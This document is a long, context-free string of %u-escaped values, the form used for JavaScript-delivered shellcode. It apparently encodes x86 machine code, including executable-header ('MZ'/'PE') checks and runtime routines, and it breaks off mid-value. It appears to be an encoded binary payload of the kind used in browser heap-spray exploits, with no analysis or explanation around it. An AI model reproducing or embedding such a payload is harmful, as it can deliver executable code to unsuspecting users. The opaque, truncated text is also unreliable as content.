%ua8c4%u0040%u7501%u8d1e%uf504%ua8c0%u0040%u3889%ua068%u000f%uff00%u8330%u18c7%u8fe8%u000f%u5900%u8559%u74c0%u460c%ufe83%u7c24%u33d2%u40c0%u5e5f%u83c3%uf524%ua8c0%u0040%u3300%uebc0%u8bf1%u53ff%u1d8b%u80d8%u0040%ube56%ua8c0%u0040%u8b57%u853e%u74ff%u8313%u047e%u7401%u570d%ud3ff%ue857%u013f%u0000%u2683%u5900%uc683%u8108%ue0fe%u40a9%u7c00%ubedc%ua8c0%u0040%u8b5f%u8506%u74c0%u8309%u047e%u7501%u5003%ud3ff%uc683%u8108%ue0fe%u40a9%u7c00%u5ee6%uc35b%uff8b%u8b55%u8bec%u0845%u34ff%uc0c5%u40a8%uff00%u0c15%u4081%u5d00%u6ac3%u680c%u9670%u0040%u1be8%ufff6%u33ff%u47ff%u7d89%u33e4%u39db%u1c1d%u40b1%u7500%ue818%ued31%uffff%u1e6a%u7fe8%uffeb%u68ff%u00ff%u0000%uc1e8%uffe8%u59ff%u8b59%u0875%u348d%uc0f5%u40a8%u3900%u741e%u8b04%uebc7%u6a6e%ue818%u0137%u0000%u8b59%u3bf8%u75fb%ue80f%ud6a6%uffff%u00c7%u000c%u0000%uc033%u51eb%u0a6a%u59e8%u0000%u5900%u5d89%u39fc%u751e%u682c%u0fa0%u0000%ue857%u0e86%u0000%u5959%uc085%u1775%ue857%u006d%u0000%ue859%ud670%uffff%u00c7%u000c%u0000%u5d89%uebe4%u890b%ueb3e%u5707%u52e8%u0000%u5900%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%uf5b3%uffff%u6ac3%ue80a%uff28%uffff%uc359%uff8b%u8b55%u8bec%u0845%u8d56%uc534%ua8c0%u0040%u3e83%u7500%u5013%u22e8%uffff%u59ff%uc085%u0875%u116a%ub5e8%uffe7%u59ff%u36ff%u15ff%u8110%u0040%u5d5e%u6ac3%u680c%u9690%u0040%u25e8%ufff5%u8bff%u0875%uf685%u7574%u3d83%ub6d4%u0040%u7503%u6a43%ue804%uffaa%uffff%u8359%ufc65%u5600%u95e8%u0010%u5900%u4589%u85e4%u74c0%u5609%ue850%u10b6%u0000%u5959%u45c7%ufefc%uffff%ue8ff%u000b%u0000%u7d83%u00e4%u3775%u75ff%ueb08%u6a0a%ue804%ufe96%uffff%uc359%u6a56%uff00%u1c35%u40b1%uff00%ue415%u4080%u8500%u75c0%ue816%ud592%uffff%uf08b%u15ff%u8018%u0040%ue850%ud542%uffff%u0689%ue859%uf4e9%uffff%u8bc3%u55ff%uec8b%u5756%uf633%u75ff%ue808%u2134%u0000%uf88b%u8559%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uca75%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%u6af6%uff00%u0c75%u75ff%ue808%u21e4%u0000%uf88b%uc483%u850c%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uc375%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%ufff6%u0c75%u75ff%ue808%u22b8%u0000%uf88b%u5959%uff85%u2c75%u4539%u740c%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uc175%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u0ff6%u8184%u0001%uff00%u0476%u7ae8%ufffe%uffff%u0876%u72e8%ufffe%uffff%u0c76%u6ae8%ufffe%uffff%u1076%u62e8%ufffe%uffff%u1476%u5ae8%ufffe%uffff%u1876%u52e8%ufffe%uffff%ue836%ufe4b%uffff%u76ff%ue820%ufe43%uffff%u76ff%ue824%ufe3b%uffff%u76ff%ue828%ufe33%uffff%u76ff%ue82c%ufe2b%uffff%u76ff%ue830%ufe23%uffff%u76ff%ue834%ufe1b%uffff%u76ff%ue81c%ufe13%uffff%u76ff%ue838%ufe0b%uffff%u76ff%ue83c%ufe03%uffff%uc483%uff40%u4076%uf8e8%ufffd%uffff%u4476%uf0e8%ufffd%uffff%u4876%ue8e8%ufffd%uffff%u4c76%ue0e8%ufffd%uffff%u5076%ud8e8%ufffd%uffff%u5476%ud0e8%ufffd%uffff%u5876%uc8e8%ufffd%uffff%u5c76%uc0e8%ufffd%uffff%u6076%ub8e8%ufffd%uffff%u6476%ub0e8%ufffd%uffff%u6876%ua8e8%ufffd%uffff%u6c76%ua0e8%ufffd%uffff%u7076%u98e8%ufffd%uffff%u7476%u90e8%ufffd%uffff%u7876%u88e8%ufffd%uffff%u7c76%u80e8%ufffd%u83ff%u40c4%ub6ff%u0080%u0000%u72e8%ufffd%uffff%u84b6%u0000%ue800%ufd67%uffff%ub6ff%u0088%u0000%u5ce8%ufffd%uffff%u8cb6%u0000%ue800%ufd51%uffff%ub6ff%u0090%u0000%u46e8%ufffd%uffff%u94b6%u0000%ue800%ufd3b%uffff%ub6ff%u0098%u0000%u30e8%ufffd%uffff%u9cb6%u0000%ue800%ufd25%uffff%ub6ff%u00a0%u0000%u1ae8%ufffd%uffff%ua4b6%u0000%ue800%ufd0f%uffff%ub6ff%u00a8%u0000%u04e8%ufffd%u83ff%u2cc4%u5d5e%u8bc3%u55ff%uec8b%u8b56%u0875%uf685%u3574%u068b%u053b%uaaa8%u0040%u0774%ue850%ufce1%uffff%u8b59%u0446%u053b%uaaac%u0040%u0774%ue850%ufccf%uffff%u8b59%u0876%u353b%uaab0%u0040%u0774%ue856%ufcbd%uffff%u5e59%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u74f6%u8b7e%u0c46%u053b%uaab4%u0040%u0774%ue850%ufc9b%uffff%u8b59%u1046%u053b%uaab8%u0040%u0774%ue850%ufc89%uffff%u8b59%u1446%u053b%uaabc%u0040%u0774%ue850%ufc77%uffff%u8b59%u1846%u053b%uaac0%u0040%u0774%ue850%ufc65%uffff%u8b59%u1c46%u053b%uaac4%u0040%u0774%ue850%ufc53%uffff%u8b59%u2046%u053b%uaac8%u0040%u0774%ue850%ufc41%uffff%u8b59%u2476%u353b%uaacc%u0040%u0774%ue856%ufc2f%uffff%u5e59%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uc983%u8dff%u0049%uc183%u8a01%u0a06%u74c0%u8309%u01c6%ua30f%u2404%uee73%uc18b%uc483%u5e20%uc3c9%uff8b%u8b55%u8bec%u084d%u3353%u56db%u3b57%u74cb%u8b07%u0c7d%ufb3b%u1b77%uc5e8%uffd1%u6aff%u5e16%u3089%u5353%u5353%ue853%ud14e%uffff%uc483%u8b14%uebc6%u8b30%u1075%uf33b%u0475%u1988%udaeb%ud18b%u068a%u0288%u4642%uc33a%u0374%u754f%u3bf3%u75fb%u8810%ue819%ud18a%uffff%u226a%u8959%u8b08%uebf1%u33c1%u5fc0%u5b5e%uc35d%ucccc%u8b55%u57ec%u8b56%u0c75%u4d8b%u8b10%u087d%uc18b%ud18b%uc603%ufe3b%u0876%uf83b%u820f%u01a4%u0000%uf981%u0100%u0000%u1f72%u3d83%ub6b0%u0040%u7400%u5716%u8356%u0fe7%ue683%u3b0f%u5efe%u755f%u5e08%u5d5f%uede9%u0021%uf700%u03c7%u0000%u7500%uc115%u02e9%ue283%u8303%u08f9%u2a72%ua5f3%u24ff%u0495%u4052%u9000%uc78b%u03ba%u0000%u8300%u04e9%u0c72%ue083%u0303%uffc8%u8524%u5118%u0040%u24ff%u148d%u4052%u9000%u24ff%u988d%u4051%u9000%u5128%u0040%u5154%u0040%u5178%u0040%ud123%u068a%u0788%u468a%u8801%u0147%u468a%uc102%u02e9%u4788%u8302%u03c6%uc783%u8303%u08f9%ucc72%ua5f3%u24ff%u0495%u4052%u8d00%u0049%ud123%u068a%u0788%u468a%uc101%u02e9%u4788%u8301%u02c6%uc783%u8302%u08f9%ua672%ua5f3%u24ff%u0495%u4052%u9000%ud123%u068a%u0788%uc683%uc101%u02e9%uc783%u8301%u08f9%u8872%ua5f3%u24ff%u0495%u4052%u8d00%u0049%u51fb%u0040%u51e8%u0040%u51e0%u0040%u51d8%u0040%u51d0%u0040%u51c8%u0040%u51c0%u0040%u51b8%u0040%u448b%ue48e%u4489%ue48f%u448b%ue88e%u4489%ue88f%u448b%uec8e%u4489%uec8f%u448b%uf08e%u4489%uf08f%u448b%uf48e%u4489%uf48f%u448b%uf88e%u4489%uf88f%u448b%ufc8e%u4489%ufc8f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u5204%u0040%uff8b%u5214%u0040%u521c%u0040%u5228%u0040%u523c%u0040%u458b%u5e08%uc95f%u90c3%u068a%u0788%u458b%u5e08%uc95f%u90c3%u068a%u0788%u468a%u8801%u0147%u458b%u5e08%uc95f%u8dc3%u0049%u068a%u0788%u468a%u8801%u0147%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u748d%ufc31%u7c8d%ufc39%uc7f7%u0003%u0000%u2475%ue9c1%u8302%u03e2%uf983%u7208%ufd0d%ua5f3%ufffc%u9524%u53a0%u0040%uff8b%ud9f7%u24ff%u508d%u4053%u8d00%u0049%uc78b%u03ba%u0000%u8300%u04f9%u0c72%ue083%u2b03%uffc8%u8524%u52a4%u0040%u24ff%ua08d%u4053%u9000%u52b4%u0040%u52d8%u0040%u5300%u0040%u468a%u2303%u88d1%u0347%uee83%uc101%u02e9%uef83%u8301%u08f9%ub272%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u468a%u2303%u88d1%u0347%u468a%uc102%u02e9%u4788%u8302%u02ee%uef83%u8302%u08f9%u8872%uf3fd%ufca5%u24ff%ua095%u4053%u9000%u468a%u2303%u88d1%u0347%u468a%u8802%u0247%u468a%uc101%u02e9%u4788%u8301%u03ee%uef83%u8303%u08f9%u820f%uff56%uffff%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u5354%u0040%u535c%u0040%u5364%u0040%u536c%u0040%u5374%u0040%u537c%u0040%u5384%u0040%u5397%u0040%u448b%u1c8e%u4489%u1c8f%u448b%u188e%u4489%u188f%u448b%u148e%u4489%u148f%u448b%u108e%u4489%u108f%u448b%u0c8e%u4489%u0c8f%u448b%u088e%u4489%u088f%u448b%u048e%u4489%u048f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u53a0%u0040%uff8b%u53b0%u0040%u53b8%u0040%u53c8%u0040%u53dc%u0040%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u458b%u5e08%uc95f%u8dc3%u0049%u468a%u8803%u0347%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u468a%u8802%u0247%u468a%u8801%u0147%u458b%u5e08%uc95f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%u4c8b%u0424%uc1f7%u0003%u0000%u2474%u018a%uc183%u8401%u74c0%uf74e%u03c1%u0000%u7500%u05ef%u0000%u0000%ua48d%u0024%u0000%u8d00%u24a4%u0000%u0000%u018b%uffba%ufefe%u037e%u83d0%ufff0%uc233%uc183%ua904%u0100%u8101%ue874%u418b%u84fc%u74c0%u8432%u74e4%ua924%u0000%u00ff%u1374%u00a9%u0000%u74ff%ueb02%u8dcd%uff41%u4c8b%u0424%uc12b%u8dc3%ufe41%u4c8b%u0424%uc12b%u8dc3%ufd41%u4c8b%u0424%uc12b%u8dc3%ufc41%u4c8b%u0424%uc12b%uccc3%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uff8b%u068a%uc00a%u0c74%uc683%u0f01%u04a3%u7324%u8df1%uff46%uc483%u5e20%uc3c9%u086a%ub068%u4096%ue800%uec54%uffff%udce8%uffda%u8bff%u7840%uc085%u1674%u6583%u00fc%ud0ff%u07eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%ubae8%u001e%ue800%uec6d%uffff%u68c3%u54d0%u0040%ue3e8%uffd7%u59ff%u80a3%u40b2%uc300%uff8b%u8b55%u51ec%u5653%uff57%ue835%u40b7%ue800%ud843%uffff%u35ff%ub7e4%u0040%uf88b%u7d89%ue8fc%ud833%uffff%uf08b%u5959%uf73b%u820f%u0083%u0000%ude8b%udf2b%u438d%u8304%u04f8%u7772%ue857%u1f78%u0000%uf88b%u438d%u5904%uf83b%u4873%u00b8%u0008%u3b00%u73f8%u8b02%u03c7%u3bc7%u72c7%u500f%u75ff%ue8fc%uf79e%uffff%u5959%uc085%u1675%u478d%u3b10%u72c7%u5040%u75ff%ue8fc%uf788%uffff%u5959%uc085%u3174%ufbc1%u5002%u348d%ue898%ud74e%uffff%ua359%ub7e8%u0040%u75ff%ue808%ud740%uffff%u0689%uc683%u5604%u35e8%uffd7%u59ff%ue4a3%u40b7%u8b00%u0845%ueb59%u3302%u5fc0%u5b5e%uc3c9%uff8b%u6a56%u6a04%ue820%uf6f2%uffff%uf08b%ue856%ud70e%uffff%uc483%ua30c%ub7e8%u0040%ue4a3%u40b7%u8500%u75f6%u6a05%u5818%uc35e%u2683%u3300%u5ec0%u6ac3%u680c%u96d0%u0040%u1fe8%uffeb%ue8ff%uddfe%uffff%u6583%u00fc%u75ff%ue808%ufef8%uffff%u8959%ue445%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%ueb3b%uffff%ue8c3%udddd%uffff%u8bc3%u55ff%uec8b%u75ff%ue808%uffb7%uffff%ud8f7%uc01b%ud8f7%u4859%uc35d%uff8b%u5756%uff33%ub78d%uaaf0%u0040%u36ff%u8be8%uffd6%u83ff%u04c7%u8959%u8306%u28ff%ue872%u5e5f%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u084d%u4db8%u005a%u6600%u0139%u0474%uc033%uc35d%u418b%u033c%u81c1%u5038%u0045%u7500%u33ef%ub9d2%u010b%u0000%u3966%u1848%u940f%u8bc2%u5dc2%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u0845%u488b%u033c%u0fc8%u41b7%u5314%u0f56%u71b7%u3306%u57d2%u448d%u1808%uf685%u1b76%u7d8b%u8b0c%u0c48%uf93b%u0972%u588b%u0308%u3bd9%u72fb%u420a%uc083%u3b28%u72d6%u33e8%u5fc0%u5b5e%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u6aec%u68fe%u96f0%u0040%u9068%u4041%u6400%u00a1%u0000%u5000%uec83%u5308%u5756%ub4a1%u40a8%u3100%uf845%uc533%u8d50%uf045%ua364%u0000%u0000%u6589%uc7e8%ufc45%u0000%u0000%u0068%u4000%ue800%uff2a%uffff%uc483%u8504%u74c0%u8b55%u0845%u002d%u4000%u5000%u0068%u4000%ue800%uff50%uffff%uc483%u8508%u74c0%u8b3b%u2440%ue8c1%uf71f%u83d0%u01e0%u45c7%ufefc%uffff%u8bff%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%uec45%u088b%u018b%ud233%u053d%u0000%u0fc0%uc294%uc28b%u8bc3%ue865%u45c7%ufefc%uffff%u33ff%u8bc0%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%u55ff%uec8b%u458b%ua308%ub284%u0040%u88a3%u40b2%ua300%ub28c%u0040%u90a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%u8b08%u6c0d%u40a8%u5600%u5039%u7404%u8b0f%u6bf1%u0cf6%u7503%u8308%u0cc0%uc63b%uec72%uc96b%u030c%u084d%u3b5e%u73c1%u3905%u0450%u0274%uc033%uc35d%u35ff%ub28c%u0040%u44e8%uffd5%u59ff%u6ac3%u6820%u9710%u0040%uf5e8%uffe8%u33ff%u89ff%ue47d%u7d89%u8bd8%u085d%ufb83%u7f0b%u744c%u8b15%u6ac3%u5902%uc12b%u2274%uc12b%u0874%uc12b%u6474%uc12b%u4475%udde8%uffd6%u8bff%u89f8%ud87d%uff85%u1475%uc883%ue9ff%u0161%u0000%u84be%u40b2%ua100%ub284%u0040%u60eb%u77ff%u8b5c%ue8d3%uff5d%uffff%uf08b%uc683%u8b08%ueb06%u8b5a%u83c3%u0fe8%u3c74%ue883%u7406%u482b%u1c74%u5de8%uffc9%uc7ff%u1600%u0000%u3300%u50c0%u5050%u5050%ue3e8%uffc8%u83ff%u14c4%uaeeb%u8cbe%u40b2%ua100%ub28c%u0040%u16eb%u88be%u40b2%ua100%ub288%u0040%u0aeb%u90be%u40b2%ua100%ub290%u0040%u45c7%u01e4%u0000%u5000%u80e8%uffd4%u89ff%ue045%u3359%u83c0%ue07d%u0f01%ud884%u0000%u3900%ue045%u0775%u036a%u21e8%uffdd%u39ff%ue445%u0774%ue850%uf2b4%uffff%u3359%u89c0%ufc45%ufb83%u7408%u830a%u0bfb%u0574%ufb83%u7504%u8b1b%u604f%u4d89%u89d4%u6047%ufb83%u7508%u8b40%u644f%u4d89%uc7d0%u6447%u008c%u0000%ufb83%u7508%u8b2e%u600d%u40a8%u8900%udc4d%u0d8b%ua864%u0040%u158b%ua860%u0040%uca03%u4d39%u7ddc%u8b19%udc4d%uc96b%u8b0c%u5c57%u4489%u0811%u45ff%uebdc%ue8db%ud3e8%uffff%u0689%u45c7%ufefc%uffff%ue8ff%u0015%u0000%ufb83%u7508%uff1f%u6477%uff53%ue055%ueb59%u8b19%u085d%u7d8b%u83d8%ue47d%u7400%u6a08%ue800%uf142%uffff%uc359%uff53%ue055%u8359%u08fb%u0a74%ufb83%u740b%u8305%u04fb%u1175%u458b%u89d4%u6047%ufb83%u7508%u8b06%ud045%u4789%u3364%ue8c0%ue797%uffff%u8bc3%u55ff%uec8b%u458b%ua308%ub298%u0040%uc35d%uff8b%u8b55%u8bec%u0845%ua4a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%ua308%ub2a8%u0040%uc35d%u106a%u3068%u4097%ue800%ue718%uffff%u6583%u00fc%u75ff%uff0c%u0875%u15ff%u8064%u0040%u4589%uebe4%u8b2f%uec45%u008b%u008b%u4589%u33e0%u3dc9%u0017%uc000%u940f%u8bc1%uc3c1%u658b%u81e8%ue07d%u0017%uc000%u0875%u086a%u15ff%u80a8%u0040%u6583%u00e4%u45c7%ufefc%uffff%u8bff%ue445%u0ae8%uffe7%uc3ff%uff8b%u8b55%u8bec%u0845%uaca3%u40b2%u5d00%u8bc3%u55ff%uec8b%u35ff%ub2ac%u0040%ue6e8%uffd2%u59ff%uc085%u0f74%u75ff%uff08%u59d0%uc085%u0574%uc033%u5d40%u33c3%u5dc0%u8bc3%u55ff%uec8b%uec83%u5314%u5756%ub5e8%uffd2%u83ff%ufc65%u8300%ub03d%u40b2%u0000%ud88b%u850f%u008e%u0000%u7068%u4092%uff00%u2015%u4080%u8b00%u85f8%u0fff%u2a84%u0001%u8b00%u1c35%u4080%u6800%u9264%u0040%uff57%u85d6%u0fc0%u1484%u0001%u5000%uffe8%uffd1%uc7ff%u2404%u9254%u0040%ua357%ub2b0%u0040%ud6ff%ue850%ud1ea%uffff%u04c7%u4024%u4092%u5700%ub4a3%u40b2%uff00%u50d6%ud5e8%uffd1%uc7ff%u2404%u9224%u0040%ua357%ub2b8%u0040%ud6ff%ue850%ud1c0%uffff%ua359%ub2c0%u0040%uc085%u1474%u0c68%u4092%u5700%ud6ff%ue850%ud1a8%uffff%ua359%ub2bc%u0040%ubca1%u40b2%u3b00%u74c3%u394f%uc01d%u40b2%u7400%u5047%u06e8%uffd2%uffff%uc035%u40b2%u8b00%ue8f0%ud1f9%uffff%u5959%uf88b%uf685%u2c74%uff85%u2874%ud6ff%uc085%u1974%u4d8d%u51f8%u0c6a%u4d8d%u51ec%u016a%uff50%u85d7%u74c0%uf606%uf445%u7501%u8109%u104d%u0000%u0020%u39eb%ub4a1%u40b2%u3b00%u74c3%u5030%ub6e8%uffd1%u59ff%uc085%u2574%ud0ff%u4589%u85fc%u74c0%ua11c%ub2b8%u0040%uc33b%u1374%ue850%ud199%uffff%u8559%u74c0%uff08%ufc75%ud0ff%u4589%ufffc%ub035%u40b2%ue800%ud181%uffff%u8559%u74c0%uff10%u1075%u75ff%uff0c%u0875%u75ff%ufffc%uebd0%u3302%u5fc0%u5b5e%uc3c9%uff8b%u8b55%u8bec%u084d%u3356%u3bf6%u7cce%u831e%u02f9%u0c7e%uf983%u7503%ua114%uac68%u0040%u28eb%u68a1%u40ac%u8900%u680d%u40ac%ueb00%ue81b%uc5ca%uffff%u5656%u5656%uc756%u1600%u0000%ue800%uc552%uffff%uc483%u8314%uffc8%u5d5e%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%uc0b5%uffff%ub60f%u0c45%u4d8b%u8af4%u1455%u5484%u1d01%u1e75%u7d83%u0010%u1274%u4d8b%u8bf0%uc889%u0000%u0f00%u04b7%u2341%u1045%u02eb%uc033%uc085%u0374%uc033%u8040%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u6aec%u6a04%uff00%u0875%u006a%u9ae8%uffff%u83ff%u10c4%uc35d%uff8b%u8b55%u8bec%ub40d%u40b6%ua100%ub6b8%u0040%uc96b%u0314%uebc8%u8b11%u0855%u502b%u810c%u00fa%u1000%u7200%u8309%u14c0%uc13b%ueb72%uc033%uc35d%uff8b%u8b55%u83ec%u10ec%u4d8b%u8b08%u1041%u8b56%u0c75%u8b57%u2bfe%u0c79%uc683%uc1fc%u0fef%ucf8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf04d%u0e8b%u8949%ufc4d%uc1f6%u0f01%ud385%u0002%u5300%u1c8d%u8b31%u8913%uf455%u568b%u89fc%uf855%u558b%u89f4%u0c5d%uc2f6%u7501%uc174%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%u044b%u4b3b%u7508%ubb42%u0000%u8000%ufa83%u7320%u8b19%ud3ca%u8deb%u024c%uf704%u21d3%ub85c%ufe44%u7509%u8b23%u084d%u1921%u1ceb%u4a8d%ud3e0%u8deb%u024c%uf704%u21d3%ub89c%u00c4%u0000%u09fe%u0675%u4d8b%u2108%u0459%u5d8b%u8b0c%u0853%u5b8b%u8b04%ufc4d%u4d03%u89f4%u045a%u558b%u8b0c%u045a%u528b%u8908%u0853%u4d89%u8bfc%uc1d1%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%uf85d%ue383%u8901%uf45d%u850f%u008f%u0000%u752b%u8bf8%uf85d%ufbc1%u6a04%u893f%u0c75%u5e4b%ude3b%u0276%ude8b%u4d03%u8bf8%uc1d1%u04fa%u894a%ufc4d%ud63b%u0276%ud68b%uda3b%u5e74%u4d8b%u8b0c%u0471%u713b%u7508%ube3b%u0000%u8000%ufb83%u7320%u8b17%ud3cb%uf7ee%u21d6%ub874%ufe44%u034c%u7504%u8b21%u084d%u3121%u1aeb%u4b8d%ud3e0%uf7ee%u21d6%ub8b4%u00c4%u0000%u4cfe%u0403%u0675%u4d8b%u2108%u0471%u4d8b%u8b0c%u0871%u498b%u8904%u044e%u4d8b%u8b0c%u0471%u498b%u8908%u084e%u758b%ueb0c%u8b03%u085d%u7d83%u00f4%u0875%uda3b%u840f%u0080%u0000%u4d8b%u8df0%ud10c%u598b%u8904%u084e%u5e89%u8904%u0471%u4e8b%u8904%u0871%u4e8b%u3b04%u084e%u6075%u4c8a%u0402%u4d88%ufe0f%u88c1%u024c%u8304%u20fa%u2573%u7d80%u000f%u0e75%uca8b%u00bb%u0000%ud380%u8beb%u084d%u1909%u00bb%u0000%u8b80%ud3ca%u8deb%ub844%u0944%ueb18%u8029%u0f7d%u7500%u8d10%ue04a%u00bb%u0000%ud380%u8beb%u084d%u5909%u8d04%ue04a%u00ba%u0000%ud380%u8dea%ub884%u00c4%u0000%u1009%u458b%u89fc%u8906%u3044%u8bfc%uf045%u08ff%u850f%u00f3%u0000%uc4a1%u40b2%u8500%u0fc0%ud884%u0000%u8b00%uc80d%u40b6%u8b00%ue035%u4080%u6800%u4000%u0000%ue1c1%u030f%u0c48%u00bb%u0080%u5300%uff51%u8bd6%uc80d%u40b6%ua100%ub2c4%u0040%u00ba%u0000%ud380%u09ea%u0850%uc4a1%u40b2%u8b00%u1040%u0d8b%ub6c8%u0040%ua483%uc488%u0000%u0000%uc4a1%u40b2%u8b00%u1040%u48fe%ua143%ub2c4%u0040%u488b%u8010%u4379%u7500%u8309%u0460%ua1fe%ub2c4%u0040%u7883%uff08%u6575%u6a53%uff00%u0c70%ud6ff%uc4a1%u40b2%uff00%u1070%u006a%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u0d8b%ub6b4%u0040%uc4a1%u40b2%u6b00%u14c9%u158b%ub6b8%u0040%uc82b%u4c8d%uec11%u8d51%u1448%u5051%uade8%u0015%u8b00%u0845%uc483%uff0c%ub40d%u40b6%u3b00%uc405%u40b2%u7600%u8304%u086d%ua114%ub6b8%u0040%uc0a3%u40b6%u8b00%u0845%uc4a3%u40b2%u8900%uc83d%u40b6%u5b00%u5e5f%uc3c9%uc4a1%u40b6%u5600%u358b%ub6b4%u0040%u3357%u3bff%u75f0%u8334%u10c0%uc06b%u5014%u35ff%ub6b8%u0040%uff57%u1c35%u40b1%uff00%u5815%u4080%u3b00%u75c7%u3304%uebc0%u8378%uc405%u40b6%u1000%u358b%ub6b4%u0040%ub8a3%u40b6%u6b00%u14f6%u3503%ub6b8%u0040%uc468%u0041%u6a00%uff08%u1c35%u40b1%uff00%u6015%u4080%u8900%u1046%uc73b%uc774%u046a%u0068%u0020%u6800%u0000%u0010%uff57%u5c15%u4080%u8900%u0c46%uc73b%u1275%u76ff%u5710%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u9beb%u4e83%uff08%u3e89%u7e89%uff04%ub405%u40b6%u8b00%u1046%u0883%u8bff%u5fc6%uc35e%uff8b%u8b55%u51ec%u8b51%u084d%u418b%u5308%u8b56%u1071%u3357%uebdb%u0303%u43c0%uc085%uf97d%uc38b%uc069%u0204%u0000%u848d%u4430%u0001%u6a00%u893f%uf845%u895a%u0840%u4089%u8304%u08c0%u754a%u6af4%u8b04%u68fb%u1000%u0000%ue7c1%u030f%u0c79%u0068%u0080%u5700%u15ff%u805c%u0040%uc085%u0875%uc883%ue9ff%u009d%u0000%u978d%u7000%u0000%u5589%u3bfc%u77fa%u8b43%u2bca%uc1cf%u0ce9%u478d%u4110%u4883%ufff8%u8883%u0fec%u0000%u8dff%ufc90%u000f%u8900%u8d10%ufc90%uffef%uc7ff%ufc40%u0ff0%u0000%u5089%uc704%ue880%u000f%uf000%u000f%u0500%u1000%u0000%u7549%u8bcb%ufc55%u458b%u05f8%u01f8%u0000%u4f8d%u890c%u0448%u4189%u8d08%u0c4a%u4889%u8908%u0441%u6483%u449e%u3300%u47ff%ubc89%uc49e%u0000%u8a00%u4346%uc88a%uc1fe%uc084%u458b%u8808%u434e%u0375%u7809%uba04%u0000%u8000%ucb8b%uead3%ud2f7%u5021%u8b08%u5fc3%u5b5e%uc3c9%uff8b%u8b55%u83ec%u0cec%u4d8b%u8b08%u1041%u5653%u758b%u5710%u7d8b%u8b0c%u2bd7%u0c51%uc683%uc117%u0fea%uca8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf44d%u4f8b%u83fc%uf0e6%u3b49%u8df1%u397c%u8bfc%u891f%u104d%u5d89%u0ffc%u558e%u0001%uf600%u01c3%u850f%u0145%u0000%ud903%uf33b%u8f0f%u013b%u0000%u4d8b%uc1fc%u04f9%u8949%uf84d%uf983%u763f%u6a06%u593f%u4d89%u8bf8%u045f%u5f3b%u7508%ubb43%u0000%u8000%uf983%u7320%ud31a%u8beb%uf84d%u4c8d%u0401%ud3f7%u5c21%u4490%u09fe%u2675%u4d8b%u2108%ueb19%u831f%ue0c1%uebd3%u4d8b%u8df8%u014c%uf704%u21d3%u909c%u00c4%u0000%u09fe%u0675%u4d8b%u2108%u0459%u4f8b%u8b08%u045f%u5989%u8b04%u044f%u7f8b%u8908%u0879%u4d8b%u2b10%u01ce%ufc4d%u7d83%u00fc%u8e0f%u00a5%u0000%u7d8b%u8bfc%u0c4d%uffc1%u4f04%u4c8d%ufc31%uff83%u763f%u6a03%u5f3f%u5d8b%u8df4%ufb1c%u5d89%u8b10%u045b%u5989%u8b04%u105d%u5989%u8908%u044b%u598b%u8904%u084b%u598b%u3b04%u0859%u5775%u4c8a%u0407%u4d88%ufe13%u88c1%u074c%u8304%u20ff%u1c73%u7d80%u0013%u0e75%ucf8b%u00bb%u0000%ud380%u8beb%u084d%u1909%u448d%u4490%ucf8b%u20eb%u7d80%u0013%u1075%u4f8d%ubbe0%u0000%u8000%uebd3%u4d8b%u0908%u0459%u848d%uc490%u0000%u8d00%ue04f%u00ba%u0000%ud380%u09ea%u8b10%u0c55%u4d8b%u8dfc%u3244%u89fc%u8908%u014c%uebfc%u8b03%u0c55%u468d%u8901%ufc42%u4489%uf832%u3ce9%u0001%u3300%ue9c0%u0138%u0000%u8d0f%u012f%u0000%u5d8b%u290c%u1075%u4e8d%u8901%ufc4b%u5c8d%ufc33%u758b%uc110%u04fe%u894e%u0c5d%u4b89%u83fc%u3ffe%u0376%u3f6a%uf65e%ufc45%u0f01%u8085%u0000%u8b00%ufc75%ufec1%u4e04%ufe83%u763f%u6a03%u5e3f%u4f8b%u3b04%u084f%u4275%u00bb%u